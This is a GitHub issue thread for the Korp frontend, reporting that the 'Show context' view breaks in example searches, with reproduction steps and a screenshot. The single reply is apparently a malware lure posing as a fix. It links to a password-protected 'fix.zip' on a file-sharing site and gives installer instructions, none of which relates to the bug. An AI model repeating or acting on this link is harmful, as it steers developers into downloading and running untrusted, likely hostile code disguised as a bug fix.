### ISSUE TITLE
Context view broken in example search

### ISSUE THREAD

**Issue by arildm** [spraakbanken/korp-frontend#386]
1. ~~Make a comparison (I did `framtid..nn.1` vs `jämlikhet..nn.1` in `vivill`)~~ This doesn't only happen when coming from the comparison view, but seemingly in all example searches, e.g. https://spraakbanken.gu.se/korplabb/#?lang=eng&cqp=%5B%5D&corpus=vivill&result_tab=2&show_stats&search=lemgram%7Cframtid%5C.%5C.nn%5C.1
2. Click a row to get examples
3. Click "Show context"
4. **Expected:** The KWIC layout is replaced with tall rows with wrapped lines suitable for reading
5. **Actual:** The KWIC layout remains, but context sentences are added to the sides and the corpus name is ugly large, see screenshot.

![Screenshot from 2024-08-27 17-42-03](https://github.com/user-attachments/assets/4736926f-6c4e-4217-8e4b-e1660ce7968c)

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."
